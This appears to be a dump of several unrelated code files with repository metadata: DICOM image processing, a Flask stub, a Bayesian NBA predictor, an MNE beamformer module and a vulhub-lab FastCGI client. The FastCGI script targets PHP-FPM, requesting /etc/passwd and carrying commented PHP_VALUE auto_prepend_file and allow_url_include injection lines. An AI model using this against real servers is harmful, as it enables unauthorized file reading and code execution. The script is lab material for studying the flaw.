cordC1,cordC2=endPointCalculator(anglePos3,ysize,zsize,target1,target2)
y=np.sort([target1,cordC1])
z=np.sort([target2,cordC2])
trajC=np.sum(np.squeeze(costMap[target0,y[0]:y[1],z[0]:z[1]]))
defTraj=min([trajA, trajAB, trajB, trajC])
entryCoord=np.array([cordA1,cordA2,cordB2])
if defTraj == trajA:
dx1=cordA1
dy1=cordA2
dz1=target2
if defTraj == trajAB:
dx1=cordB1
dy1=cordA2
dz1=target2
if defTraj == trajB:
dx1=cordB1
dy1=target1
dz1=cordB2
if defTraj == trajC:
dx1=target0
dy1=cordC1
dz1=cordC2
if (abs(defTraj) < abs(defFrame)):
defFrame=defTraj
dx=dx1
dy=dy1
dz=dz1
entryCoord=np.array([dx,dy,dz])
x=np.sort([target0,entryCoord[0]])
y=np.sort([target1,entryCoord[1]])
z=np.sort([target2,entryCoord[2]])
maxVal=100*costMap.max()
costAp=np.copy(costMap)
costAp[x[0]:x[1],y[0]:y[1],z[0]:z[1]]=maxVal
costAp=costAp/maxVal
return(costAp,x,y,z,entryCoord,maxVal,anglePos1,anglePos2)
def rawDicomMiner(file_name,filename,range1):
# Function exports the DICOM values without any segmentation.
nSlices=len(range1)-1
slicer = [pydicom.read_file(filename, force=True)]
image = DICOMtoNumpy(slicer)
imgsize=image.shape
imgsize=np.asarray(imgsize)
xBor=imgsize[1]
yBor=imgsize[2]
costMap=np.zeros([xBor,yBor,nSlices])
for i in range (0, nSlices):
filename=file_name+str(range1[i])+'.dcm'
# filename=file_name+str(range1[i])
slices = [pydicom.read_file(filename, force=True)]
image = DICOMtoNumpy(slices)
if i==0:
ind=0
newOrder=ind
costMap[:,:,newOrder]=np.squeeze(image)
if i >>1:
ind=i-1
newOrder=int(ind)
costMap[:,:,newOrder]=np.squeeze(image)
if i==nSlices:
ind=i-1
newOrder=int(ind)
costMap[:,:,newOrder]=np.squeeze(image)
return(costMap)
def rawDicomLister(resultList):
# Function exports the DICOM values without any segmentation.
nSlices=len(resultList)-1
slicer = [pydicom.read_file(resultList[0], force=True)]
image = DICOMtoNumpy(slicer)
imgsize=image.shape
imgsize=np.asarray(imgsize)
xBor=imgsize[1]
yBor=imgsize[2]
costMap=np.zeros([xBor,yBor,nSlices])
for i in range (0, nSlices):
#filename=file_name+str(range1[i])+'.dcm'
# filename=file_name+str(range1[i])
filename=resultList[i]
slices = [pydicom.read_file(filename, force=True)]
image = DICOMtoNumpy(slices)
if i==0:
ind=0
newOrder=ind
costMap[:,:,newOrder]=np.squeeze(image)
if i >>1:
ind=i-1
newOrder=int(ind)
costMap[:,:,newOrder]=np.squeeze(image)
if i==nSlices:
ind=i-1
newOrder=int(ind)
costMap[:,:,newOrder]=np.squeeze(image)
return(costMap)
def superDicomMiner(resultList):
# Function exports the DICOM values with any segmentation into tissue types: regular, bone, and soft (blood).
nSlices=len(resultList)-1
slicer = [pydicom.read_file(resultList[0], force=True)]
image = DICOMtoNumpy(slicer)
imgsize=image.shape
imgsize=np.asarray(imgsize)
xBor=imgsize[1]
yBor=imgsize[2]
costMap=np.zeros([xBor,yBor,nSlices])
boneMap=np.zeros([xBor,yBor,nSlices])
bloodMap=np.zeros([xBor,yBor,nSlices])
for i in range (0, nSlices):
filename=resultList[i]
slices = [pydicom.read_file(filename, force=True)]
image = DICOMtoNumpy(slices)
imageBone, binaryBone = boneSegmentation(image, [300, 3000])
imageBone = np.uint8(binaryBone)
imageBlood, binaryBlood = boneSegmentation(image, [1, 250])
imageBlood = np.uint8(binaryBlood)
if i==0:
ind=0
newOrder=ind
costMap[:,:,newOrder]=np.squeeze(image)
boneMap[:,:,newOrder]=np.squeeze(imageBone)
bloodMap[:,:,newOrder]=np.squeeze(imageBlood)
if i >>1:
ind=i-1
newOrder=int(ind)
costMap[:,:,newOrder]=np.squeeze(image)
boneMap[:,:,newOrder]=np.squeeze(imageBone)
bloodMap[:,:,newOrder]=np.squeeze(imageBlood)
if i==nSlices:
ind=i-1
newOrder=int(ind)
costMap[:,:,newOrder]=np.squeeze(image)
boneMap[:,:,newOrder]=np.squeeze(imageBone)
bloodMap[:,:,newOrder]=np.squeeze(imageBlood)
return(costMap,boneMap,bloodMap)
def dicomMiner(file_name,filename,range1):
# Function exports the DICOM values with any segmentation into tissue types: regular, bone, and soft (blood).
nSlices=len(range1)-1
slicer = [pydicom.read_file(filename, force=True)]
image = DICOMtoNumpy(slicer)
imgsize=image.shape
imgsize=np.asarray(imgsize)
xBor=imgsize[1]
yBor=imgsize[2]
costMap=np.zeros([xBor,yBor,nSlices])
boneMap=np.zeros([xBor,yBor,nSlices])
bloodMap=np.zeros([xBor,yBor,nSlices])
for i in range (0, nSlices):
filename=file_name+str(range1[i])+'.dcm'
slices = [pydicom.read_file(filename, force=True)]
image = DICOMtoNumpy(slices)
imageBone, binaryBone = boneSegmentation(image, [300, 3000])
imageBone = np.uint8(binaryBone)
imageBlood, binaryBlood = boneSegmentation(image, [1, 250])
imageBlood = np.uint8(binaryBlood)
if i==0:
ind=0
newOrder=ind
costMap[:,:,newOrder]=np.squeeze(image)
boneMap[:,:,newOrder]=np.squeeze(imageBone)
bloodMap[:,:,newOrder]=np.squeeze(imageBlood)
if i >>1:
ind=i-1
newOrder=int(ind)
costMap[:,:,newOrder]=np.squeeze(image)
boneMap[:,:,newOrder]=np.squeeze(imageBone)
bloodMap[:,:,newOrder]=np.squeeze(imageBlood)
if i==nSlices:
ind=i-1
newOrder=int(ind)
costMap[:,:,newOrder]=np.squeeze(image)
boneMap[:,:,newOrder]=np.squeeze(imageBone)
bloodMap[:,:,newOrder]=np.squeeze(imageBlood)
return(costMap,boneMap,bloodMap)
def np2Mat(array,fn):
data={'array':array}
nameOut=str(fn)+'.mat'
print(nameOut)
io.savemat(nameOut,data)
def veinMiner(file_name,filename,range1):
nSlices=len(range1)-1
slicer = [pydicom.read_file(filename, force=True)]
image = DICOMtoNumpy(slicer)
imgsize=image.shape
imgsize=np.asarray(imgsize)
xBor=imgsize[1]
yBor=imgsize[2]
costMap=np.zeros([xBor,yBor,nSlices])
for i in range (0, nSlices):
filename=file_name+str(range1[i])+'.dcm'
slices = [pydicom.read_file(filename, force=True)]
image = DICOMtoNumpy(slices)
filenameOut1='unaltered'+str(file_name)+str(range1[i])+'.png'
imageV=np.squeeze(np.asarray(image))
imsave(filenameOut1,imageV)
imgsize=image.shape
imgsize=np.asarray(imgsize)
xBor=imgsize[1]
yBor=imgsize[2]
#plt.imshow(image, cmap = plt.get_cmap('gray'))
#plt.show()
imageVeins=maskedVesselSegmentation(image)
imageVeins=np.where((imageVeins == 0), 255, 0)
imageVeins=imageVeins/imageVeins.max()
imageVeins=np.where((imageVeins == 1), 0, 1)
if i==0:
ind=0
newOrder=ind
costMap[:,:,newOrder]=np.squeeze(imageVeins)
if i >>1:
ind=i-1
newOrder=int(ind)
costMap[:,:,newOrder]=np.squeeze(imageVeins)
if i==nSlices:
ind=i-1
newOrder=int(ind)
costMap[:,:,newOrder]=np.squeeze(imageVeins)
filenameOut=str(file_name)+str(range1[i])+'.png'
imsave(filenameOut,imageVeins)
#filenameOut1=str('unaltered')+str(file_name)+str(range1[i])+'.png'
#imsave(filenameOut1,image)
return(costMap)
# Main test
target0=1
if target0==0:
target0=1
target1=11
if target1==0:
target1=1
target2=3
if target2==0:
target2=1
targets=np.array([target0,target1,target2])
lbnd=0
ubnd=284
results=[]
for f in os.listdir('.'):
if f.endswith('.dcm'):
results.append(f)
#file_name = 'image'
#range1=range(lbnd,ubnd)
#filename=file_name+str(range1[0])+'.dcm'
#filename=file_name+str(range1[0])
#rawDicomMap=rawDicomMiner(file_name,filename,range1)
rawDicomMap=rawDicomLister(results)
np2Mat(rawDicomMap,'rawdicom')
dicomMap,boneMap,bloodMap=superDicomMiner(results)
#dicomMap,boneMap,bloodMap=dicomMiner(file_name,filename,range1)
np2Mat(dicomMap,'dicom')
np2Mat(boneMap,'bone')
np2Mat(bloodMap,'blood')
``` |
{
"source": "jnury/sslyze-gui",
"score": 2
} |
#### File: jnury/sslyze-gui/app.py
```python
from flask import Flask, render_template
app = Flask(__name__)
@app.route('/')
def index():
return render_template('index.html')
@app.route('/favicon.ico')
def favicon():
return app.send_static_file('favicon.ico')
@app.route('/api/hello')
def hello():
return 'Hello Word !!!'
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0')
``` |
{
"source": "JnuSimba/vulhub",
"score": 3
} |
#### File: fpm/9615e2420f31048f7e30f3937356cf75/fpm.py
```python
import socket
import random
import argparse
import sys
from io import BytesIO
# Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client
PY2 = True if sys.version_info.major == 2 else False
def bchr(i):
if PY2:
return force_bytes(chr(i))
else:
return bytes([i])
def bord(c):
if isinstance(c, int):
return c
else:
return ord(c)
def force_bytes(s):
if isinstance(s, bytes):
return s
else:
return s.encode('utf-8', 'strict')
def force_text(s):
if issubclass(type(s), str):
return s
if isinstance(s, bytes):
s = str(s, 'utf-8', 'strict')
else:
s = str(s)
return s
class FastCGIClient:
"""A Fast-CGI Client for Python"""
# private
__FCGI_VERSION = 1
__FCGI_ROLE_RESPONDER = 1
__FCGI_ROLE_AUTHORIZER = 2
__FCGI_ROLE_FILTER = 3
__FCGI_TYPE_BEGIN = 1
__FCGI_TYPE_ABORT = 2
__FCGI_TYPE_END = 3
__FCGI_TYPE_PARAMS = 4
__FCGI_TYPE_STDIN = 5
__FCGI_TYPE_STDOUT = 6
__FCGI_TYPE_STDERR = 7
__FCGI_TYPE_DATA = 8
__FCGI_TYPE_GETVALUES = 9
__FCGI_TYPE_GETVALUES_RESULT = 10
__FCGI_TYPE_UNKOWNTYPE = 11
__FCGI_HEADER_SIZE = 8
# request state
FCGI_STATE_SEND = 1
FCGI_STATE_ERROR = 2
FCGI_STATE_SUCCESS = 3
def __init__(self, host, port, timeout, keepalive):
self.host = host
self.port = port
self.timeout = timeout
if keepalive:
self.keepalive = 1
else:
self.keepalive = 0
self.sock = None
self.requests = dict()
def __connect(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(self.timeout)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# if self.keepalive:
# self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 1)
# else:
# self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 0)
try:
self.sock.connect((self.host, int(self.port)))
except socket.error as msg:
self.sock.close()
self.sock = None
print(repr(msg))
return False
return True
def __encodeFastCGIRecord(self, fcgi_type, content, requestid):
length = len(content)
buf = bchr(FastCGIClient.__FCGI_VERSION) \
+ bchr(fcgi_type) \
+ bchr((requestid >> 8) & 0xFF) \
+ bchr(requestid & 0xFF) \
+ bchr((length >> 8) & 0xFF) \
+ bchr(length & 0xFF) \
+ bchr(0) \
+ bchr(0) \
+ content
return buf
def __encodeNameValueParams(self, name, value):
nLen = len(name)
vLen = len(value)
record = b''
if nLen < 128:
record += bchr(nLen)
else:
record += bchr((nLen >> 24) | 0x80) \
+ bchr((nLen >> 16) & 0xFF) \
+ bchr((nLen >> 8) & 0xFF) \
+ bchr(nLen & 0xFF)
if vLen < 128:
record += bchr(vLen)
else:
record += bchr((vLen >> 24) | 0x80) \
+ bchr((vLen >> 16) & 0xFF) \
+ bchr((vLen >> 8) & 0xFF) \
+ bchr(vLen & 0xFF)
return record + name + value
def __decodeFastCGIHeader(self, stream):
header = dict()
header['version'] = bord(stream[0])
header['type'] = bord(stream[1])
header['requestId'] = (bord(stream[2]) << 8) + bord(stream[3])
header['contentLength'] = (bord(stream[4]) << 8) + bord(stream[5])
header['paddingLength'] = bord(stream[6])
header['reserved'] = bord(stream[7])
return header
def __decodeFastCGIRecord(self, buffer):
header = buffer.read(int(self.__FCGI_HEADER_SIZE))
if not header:
return False
else:
record = self.__decodeFastCGIHeader(header)
record['content'] = b''
if 'contentLength' in record.keys():
contentLength = int(record['contentLength'])
record['content'] += buffer.read(contentLength)
if 'paddingLength' in record.keys():
skiped = buffer.read(int(record['paddingLength']))
return record
def request(self, nameValuePairs={}, post=''):
if not self.__connect():
print('connect failure! please check your fasctcgi-server !!')
return
requestId = random.randint(1, (1 << 16) - 1)
self.requests[requestId] = dict()
request = b""
beginFCGIRecordContent = bchr(0) \
+ bchr(FastCGIClient.__FCGI_ROLE_RESPONDER) \
+ bchr(self.keepalive) \
+ bchr(0) * 5
request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_BEGIN,
beginFCGIRecordContent, requestId)
paramsRecord = b''
if nameValuePairs:
for (name, value) in nameValuePairs.items():
name = force_bytes(name)
value = force_bytes(value)
paramsRecord += self.__encodeNameValueParams(name, value)
if paramsRecord:
request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, paramsRecord, requestId)
request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, b'', requestId)
if post:
request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, force_bytes(post), requestId)
request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, b'', requestId)
self.sock.send(request)
self.requests[requestId]['state'] = FastCGIClient.FCGI_STATE_SEND
self.requests[requestId]['response'] = b''
return self.__waitForResponse(requestId)
def __waitForResponse(self, requestId):
data = b''
while True:
buf = self.sock.recv(512)
if not len(buf):
break
data += buf
data = BytesIO(data)
while True:
response = self.__decodeFastCGIRecord(data)
if not response:
break
if response['type'] == FastCGIClient.__FCGI_TYPE_STDOUT \
or response['type'] == FastCGIClient.__FCGI_TYPE_STDERR:
if response['type'] == FastCGIClient.__FCGI_TYPE_STDERR:
self.requests['state'] = FastCGIClient.FCGI_STATE_ERROR
if requestId == int(response['requestId']):
self.requests[requestId]['response'] += response['content']
if response['type'] == FastCGIClient.FCGI_STATE_SUCCESS:
self.requests[requestId]
return self.requests[requestId]['response']
def __repr__(self):
return "fastcgi connect host:{} port:{}".format(self.host, self.port)
if __name__ == '__main__':
client = FastCGIClient('127.0.0.1', 1998, 3, 0)
params = dict()
documentRoot = "/"
uri = '/etc/passwd'
content = 'IEGSEC_XXXX'
params = {
'GATEWAY_INTERFACE': 'FastCGI/1.0',
'REQUEST_METHOD': 'POST',
'SCRIPT_FILENAME': documentRoot + uri.lstrip('/'),
'SCRIPT_NAME': uri,
'QUERY_STRING': '',
'REQUEST_URI': uri,
'DOCUMENT_ROOT': documentRoot,
'SERVER_SOFTWARE': 'php/fcgiclient',
'REMOTE_ADDR': '127.0.0.1',
'REMOTE_PORT': '9985',
'SERVER_ADDR': '127.0.0.1',
'SERVER_PORT': '80',
'SERVER_NAME': "localhost",
'SERVER_PROTOCOL': 'HTTP/1.1',
'CONTENT_TYPE': 'application/text',
'CONTENT_LENGTH': "%d" % len(content),
#'PHP_VALUE': 'auto_prepend_file = php://input',
#'PHP_ADMIN_VALUE': 'allow_url_include = On'
}
response = client.request(params, content)
print(force_text(response))
``` |
{
"source": "jnuthong/bayesian_predict_nba",
"score": 3
} |
#### File: bayesian_predict_nba/code/NBA.py
```python
import re
import sys
import codecs
import thinkbayes
import datetime
import numpy as np
class NBA(thinkbayes.Suite):
"""
"""
def __init__(self, mu, sigma, name=''):
"""
"""
pmf = thinkbayes.MakeGaussianPmf(mu, sigma, 1)
thinkbayes.Suite.__init__(self, pmf, name=name)
def Likelihood(self, data, hypo):
"""
"""
lam = hypo
k = data
like = thinkbayes.EvalPoissonPmf(k, lam)
return like
def updateSet(self, dataset):
"""
"""
for data in dataset:
for hypo in self.Values():
like = self.Likelihood(data, hypo)
self.Mult(hypo, like)
return self.Normalize()
def MakeGoalPmf(suite, high=100, low=0):
"""Makes the distribution of goals scored, given distribution of lam.
suite: distribution of goal-scoring rate
high: upper bound
returns: Pmf of goals per game
"""
metapmf = thinkbayes.Pmf()
for lam, prob in suite.Items():
# TODO: low should not be zero in nba
pmf = thinkbayes.MakePoissonPmf(lam, int(high), low=0)
metapmf.Set(pmf, prob)
mix = thinkbayes.MakeMixture(metapmf, name=suite.name)
return mix
def main():
"""
"""
info = dict()
date = datetime.datetime.now().strftime("%Y%m%d")
with open("/Users/baidu/Desktop/ThinkBayes/detail/%s" % date) as file_obj:
for line in file_obj:
line = line.strip("\n\r").split(",")
playid, num, side, home, a, b, score, c, d = line
key = side + home
info[key] = [playid, num, a, b, score, c, d]
if len(sys.argv) >= 3:
score = float(sys.argv[2])
else:
score = 0
with open(sys.argv[1]) as file_obj:
line = file_obj.readline()
line = line.strip("\n\r").split(" ")
size, home = line[0:2]
total_mu, total_sigma, side_mu, side_sigma = [float(ele) for ele in line[2:]]
line = file_obj.readline()
line = line.strip("\n\r").split(",")
total_data = [float(ele) for ele in line]
line = file_obj.readline()
line = line.strip("\n\r").split(",")
side_data = [float(ele) for ele in line]
# line = file_obj.readline()
# score = float(line.strip("\n\r"))
line = file_obj.readline()
line = line.strip("\n\r").split(",")
home_data = [float(ele) for ele in line]
home_mu = np.mean(home_data)
home_sigma = np.std(home_data)
side_team = NBA(mu=side_mu, sigma=side_sigma, name="side_team")
home_team = NBA(mu=home_mu, sigma=home_sigma, name="home_team")
total_team = NBA(mu=total_mu, sigma=total_sigma, name="total_team")
total_team.updateSet(home_data)
side_team.updateSet(side_data)
goal_side = MakeGoalPmf(side_team, low=side_mu - side_sigma * 2, high=side_mu + side_sigma * 2)
goal_home = MakeGoalPmf(home_team, low=home_mu - home_sigma * 2, high=home_mu + home_sigma * 2)
goal_total = MakeGoalPmf(total_team, low=total_mu - total_sigma * 2, high=total_mu + total_sigma * 2)
# diff = goal_total - goal_side - goal_side
diff = goal_home - goal_side
key = size + home
home_win = diff.ProbGreater(-1.0 * score)
home_loss = diff.ProbLess(-1.0 * score)
# home_win = diff.ProbGreater(0)
# home_loss = diff.ProbLess(0)
# p_tie = diff.Prob(0)
value = info[key]
print "================ Game start =================="
print size, home, value[1], total_mu, total_sigma, side_mu, side_sigma
print score, value[2], value[3]
print "Home win: %.4f, expected %.4f" % (home_win, home_win * float(value[3]))
print "Side win: %.4f, expected %.4f" % (home_loss, home_loss * float(value[2]))
print "####### Change Score #######"
print value[4], value[5], value[6]
home_win = diff.ProbGreater(-1.0 * float(value[4]))
home_loss = diff.ProbLess(-1.0 * float(value[4]))
print "Home win: %.4f, expected %.4f" % (home_win, home_win * float(value[6]))
print "Side win: %.4f, expected %.4f" % (home_loss, home_loss * float(value[5]))
with open(sys.argv[1]) as file_obj:
print "+++++++++ game detail +++++++++"
data = file_obj.read()
print data
print "================ Game end =================="
if __name__ == "__main__":
reload(sys)
sys.setdefaultencoding("utf-8")
main()
``` |
{
"source": "jnvance/cubex",
"score": 3
} |
#### File: cubex/cubex/__init__.py
```python
__version__ = '0.0a'
from cubex.cube import Cube
def open(path):
"""Create a CUBE object."""
cube = Cube()
cube.open(path)
return cube
``` |
{
"source": "jnvandermeer/mne-python",
"score": 2
} |
#### File: mne/beamformer/_compute_beamformer.py
```python
from copy import deepcopy
import numpy as np
from scipy import linalg
from ..cov import Covariance
from ..io.constants import FIFF
from ..io.proj import make_projector, Projection
from ..io.pick import (pick_channels_forward, pick_info)
from ..minimum_norm.inverse import _get_vertno
from ..source_space import label_src_vertno_sel
from ..utils import logger, warn, estimate_rank, verbose, check_fname
from ..channels.channels import _contains_ch_type
from ..time_frequency.csd import CrossSpectralDensity
from ..externals.h5io import read_hdf5, write_hdf5
def _reg_pinv(x, reg, rcond=1e-15):
"""Compute a regularized pseudoinverse of a square array.
Parameters
----------
x : ndarray, shape (n, n)
Square array to invert.
reg : float
Regularization parameter.
rcond : float | 'auto'
Cutoff for small singular values. Singular values smaller (in modulus)
than `rcond` * largest_singular_value (again, in modulus) are set to
zero. Use 'auto' to attempt to automatically set a sane value. Defaults
to 1e-15.
"""
covrank, s = estimate_rank(x, tol='auto', norm=False, return_singular=True)
# This adds the regularization without using np.eye
d = reg * np.trace(x) / len(x)
x = x.copy()
x.flat[::x.shape[0] + 1] += d
if covrank < len(x):
if reg == 0:
warn('Covariance matrix is rank-deficient and no regularization '
'is done.')
if rcond == 'auto':
# Reduce the toleration of the pseudo-inverse to force a solution
s = linalg.svd(x, compute_uv=False)
tol = s[covrank - 1:covrank + 1].mean()
tol = max(
tol,
len(x) * linalg.norm(x) * np.finfo(float).eps
)
rcond = tol / s.max()
if rcond == 'auto':
rcond = 1e-15
return linalg.pinv(x, rcond=rcond), d
def _eig_inv(x, rank):
"""Compute a pseudoinverse with smallest component set to zero."""
U, s, V = linalg.svd(x)
# pseudoinverse is computed by setting eigenvalues not included in
# signalspace to zero
s_inv = np.zeros(s.shape)
s_inv[:rank] = 1. / s[:rank]
x_inv = np.dot(V.T, s_inv[:, np.newaxis] * U.T)
return x_inv
def _setup_picks(info, forward, data_cov=None, noise_cov=None):
"""Return good channels common to forward model and covariance matrices."""
# get a list of all channel names:
fwd_ch_names = forward['info']['ch_names']
# handle channels from forward model and info:
ch_names = _compare_ch_names(info['ch_names'], fwd_ch_names, info['bads'])
# inform about excluding channels:
if (data_cov is not None and set(info['bads']) != set(data_cov['bads']) and
(len(set(ch_names).intersection(data_cov['bads'])) > 0)):
logger.info('info["bads"] and data_cov["bads"] do not match, '
'excluding bad channels from both.')
if (noise_cov is not None and
set(info['bads']) != set(noise_cov['bads']) and
(len(set(ch_names).intersection(noise_cov['bads'])) > 0)):
logger.info('info["bads"] and noise_cov["bads"] do not match, '
'excluding bad channels from both.')
# handle channels from data cov if data cov is not None
# Note: data cov is supposed to be None in tf_lcmv
if data_cov is not None:
ch_names = _compare_ch_names(ch_names, data_cov.ch_names,
data_cov['bads'])
# handle channels from noise cov if noise cov available:
if noise_cov is not None:
ch_names = _compare_ch_names(ch_names, noise_cov.ch_names,
noise_cov['bads'])
picks = [info['ch_names'].index(k) for k in ch_names if k in
info['ch_names']]
return picks
def _compare_ch_names(names1, names2, bads):
"""Return channel names of common and good channels."""
ch_names = [ch for ch in names1 if ch not in bads and ch in names2]
return ch_names
def _check_one_ch_type(info, picks, noise_cov, method):
"""Check number of sensor types and presence of noise covariance matrix."""
info_pick = pick_info(info, sel=picks)
ch_types =\
[_contains_ch_type(info_pick, tt) for tt in ('mag', 'grad', 'eeg')]
if method == 'lcmv' and sum(ch_types) > 1 and noise_cov is None:
raise ValueError('Source reconstruction with several sensor types '
'requires a noise covariance matrix to be '
'able to apply whitening.')
elif method == 'dics' and sum(ch_types) > 1:
warn('The use of several sensor types with the DICS beamformer is '
'not heavily tested yet.')
def _pick_channels_spatial_filter(ch_names, filters):
"""Return data channel indices to be used with spatial filter.
Unlike ``pick_channels``, this respects the order of ch_names.
"""
sel = []
# first check for channel discrepancies between filter and data:
for ch_name in filters['ch_names']:
if ch_name not in ch_names:
raise ValueError('The spatial filter was computed with channel %s '
'which is not present in the data. You should '
'compute a new spatial filter restricted to the '
'good data channels.' % ch_name)
# then compare list of channels and get selection based on data:
sel = [ii for ii, ch_name in enumerate(ch_names)
if ch_name in filters['ch_names']]
return sel
def _check_proj_match(info, filters):
"""Check whether SSP projections in data and spatial filter match."""
proj_data, _, _ = make_projector(info['projs'],
filters['ch_names'])
if not np.array_equal(proj_data, filters['proj']):
raise ValueError('The SSP projections present in the data '
'do not match the projections used when '
'calculating the spatial filter.')
def _check_src_type(filters):
"""Check whether src_type is in filters and set custom warning."""
if 'src_type' not in filters:
filters['src_type'] = None
warn_text = ('The spatial filter does not contain src_type and a robust '
'guess of src_type is not possible without src. Consider '
'recomputing the filter.')
return filters, warn_text
def _prepare_beamformer_input(info, forward, label, picks, pick_ori,
fwd_norm=None):
"""Input preparation common for all beamformer functions.
Check input values, prepare channel list and gain matrix. For documentation
of parameters, please refer to _apply_lcmv.
"""
is_free_ori = forward['source_ori'] == FIFF.FIFFV_MNE_FREE_ORI
if pick_ori in ['normal', 'max-power', 'vector']:
if not is_free_ori:
raise ValueError(
'Normal or max-power orientation can only be picked '
'when a forward operator with free orientation is used.')
elif pick_ori is not None:
raise ValueError('pick_ori must be one of "normal", "max-power", '
'"vector", or None, got %s' % (pick_ori,))
if pick_ori == 'normal' and not forward['surf_ori']:
# XXX eventually this could just call convert_forward_solution
raise ValueError('Normal orientation can only be picked when a '
'forward operator oriented in surface coordinates is '
'used.')
if pick_ori == 'normal' and not forward['src'][0]['type'] == 'surf':
raise ValueError('Normal orientation can only be picked when a '
'forward operator with a surface-based source space '
'is used.')
# Restrict forward solution to selected channels
info_ch_names = [ch['ch_name'] for ch in info['chs']]
ch_names = [info_ch_names[k] for k in picks]
fwd_ch_names = forward['sol']['row_names']
# Keep channels in forward present in info:
fwd_ch_names = [ch for ch in fwd_ch_names if ch in info_ch_names]
forward = pick_channels_forward(forward, fwd_ch_names)
picks_forward = [fwd_ch_names.index(ch) for ch in ch_names]
# Get gain matrix (forward operator)
if label is not None:
vertno, src_sel = label_src_vertno_sel(label, forward['src'])
if is_free_ori:
src_sel = 3 * src_sel
src_sel = np.c_[src_sel, src_sel + 1, src_sel + 2]
src_sel = src_sel.ravel()
G = forward['sol']['data'][:, src_sel]
else:
vertno = _get_vertno(forward['src'])
G = forward['sol']['data']
# Apply SSPs
proj, ncomp, _ = make_projector(info['projs'], fwd_ch_names)
if info['projs']:
G = np.dot(proj, G)
# Pick after applying the projections. This makes a copy of G, so further
# operations can be safely done in-place.
G = G[picks_forward]
proj = proj[np.ix_(picks_forward, picks_forward)]
# Normalize the leadfield if requested
if fwd_norm == 'dipole': # each orientation separately
G /= np.linalg.norm(G, axis=0)
elif fwd_norm == 'vertex': # all three orientations per loc jointly
depth_prior = np.sum(G ** 2, axis=0)
if is_free_ori:
depth_prior = depth_prior.reshape(-1, 3).sum(axis=1)
# Spherical leadfield can be zero at the center
depth_prior[depth_prior == 0.] = np.min(
depth_prior[depth_prior != 0.])
if is_free_ori:
depth_prior = np.repeat(depth_prior, 3)
source_weighting = np.sqrt(1. / depth_prior)
G *= source_weighting[np.newaxis, :]
elif fwd_norm is not None:
raise ValueError('Got invalid value for "fwd_norm". Valid '
'values are: "dipole", "vertex" or None.')
return is_free_ori, ch_names, proj, vertno, G
def _compute_beamformer(method, G, Cm, reg, n_orient, weight_norm,
pick_ori, reduce_rank, rank, is_free_ori,
inversion=None):
"""Compute a spatial filter (LCMV or DICS)."""
# Tikhonov regularization using reg parameter d to control for
# trade-off between spatial resolution and noise sensitivity
if method == 'lcmv':
Cm_inv, d = _reg_pinv(Cm.copy(), reg)
elif method == 'dics':
Cm_inv, _ = _reg_pinv(Cm, reg, rcond='auto')
if weight_norm is not None and inversion is not 'single':
# Compute square of Cm_inv used for weight normalization
Cm_inv_sq = np.dot(Cm_inv, Cm_inv)
if weight_norm == 'nai':
# estimate noise level based on covariance matrix, taking the
# smallest eigenvalue that is not zero
noise, _ = linalg.eigh(Cm)
if rank is not None:
rank_Cm = rank
else:
rank_Cm = estimate_rank(Cm, tol='auto', norm=False,
return_singular=False)
noise = noise[-rank_Cm]
# use either noise floor or regularization parameter d
noise = max(noise, d)
# compute spatial filter
W = np.dot(G.T, Cm_inv)
n_sources = G.shape[1] // n_orient
for k in range(n_sources):
Wk = W[n_orient * k: n_orient * k + n_orient]
Gk = G[:, n_orient * k: n_orient * k + n_orient]
if method == 'lcmv' and np.all(Gk == 0.):
continue
Ck = np.dot(Wk, Gk)
if method == 'dics':
# Normalize the spatial filters:
if Wk.ndim == 2 and len(Wk) > 1:
# Free source orientation
if inversion == 'single':
# Invert for each dipole separately using plain division
Wk /= np.diag(Ck)[:, np.newaxis]
elif inversion == 'matrix':
# Invert for all dipoles simultaneously using matrix
# inversion.
Wk[:] = np.dot(linalg.pinv(Ck, 0.1), Wk)
else:
# Fixed source orientation
Wk /= Ck
# compute scalar beamformer by finding the source orientation
# which maximizes output source power
if pick_ori == 'max-power':
if weight_norm is not None and inversion is not 'single':
# finding optimal orientation for NAI and unit-noise-gain
# based on [2]_, Eq. 4.47
tmp = np.dot(Gk.T, np.dot(Cm_inv_sq, Gk))
if reduce_rank:
# use pseudo inverse computation setting smallest component
# to zero if the leadfield is not full rank
tmp_inv = _eig_inv(tmp, tmp.shape[0] - 1)
else:
# use straight inverse with full rank leadfield
try:
tmp_inv = linalg.inv(tmp)
except np.linalg.linalg.LinAlgError:
raise ValueError('Singular matrix detected when '
'estimating spatial filters. '
'Consider reducing the rank of the '
'leadfield by using '
'reduce_rank=True.')
power = np.dot(tmp_inv, np.dot(Wk, Gk))
elif weight_norm is not None and inversion == 'single':
# First make the filters unit gain, then apply them to the
# CSD matrix to compute power.
norm = 1 / np.sqrt(np.sum(Wk ** 2, axis=1))
Wk_norm = Wk / norm[:, np.newaxis]
power = Wk_norm.dot(Cm).dot(Wk_norm.T)
else:
if method == 'dics':
# Compute spectral power by applying the spatial filters to
# the CSD matrix.
power = Wk.dot(Cm).dot(Wk.T)
elif method == 'lcmv':
# no weight-normalization and max-power is not implemented
# yet for lcmv beamformer:
raise NotImplementedError('The max-power orientation '
'selection is not yet '
'implemented with weight_norm '
'set to None.')
# compute the orientation:
if method == 'lcmv':
eig_vals, eig_vecs = linalg.eig(power)
if np.iscomplex(eig_vecs).any():
raise ValueError('The eigenspectrum of the leadfield '
'at this voxel is complex. Consider '
'reducing the rank of the leadfield '
'by using reduce_rank=True.')
idx_max = eig_vals.argmax()
max_ori = eig_vecs[:, idx_max]
Wk[:] = np.dot(max_ori, Wk)
Gk = np.dot(Gk, max_ori)
# compute spatial filter for NAI or unit-noise-gain
tmp = np.dot(Gk.T, np.dot(Cm_inv_sq, Gk))
denom = np.sqrt(tmp)
Wk /= denom
if weight_norm == 'nai':
Wk /= np.sqrt(noise)
is_free_ori = False
elif method == 'dics':
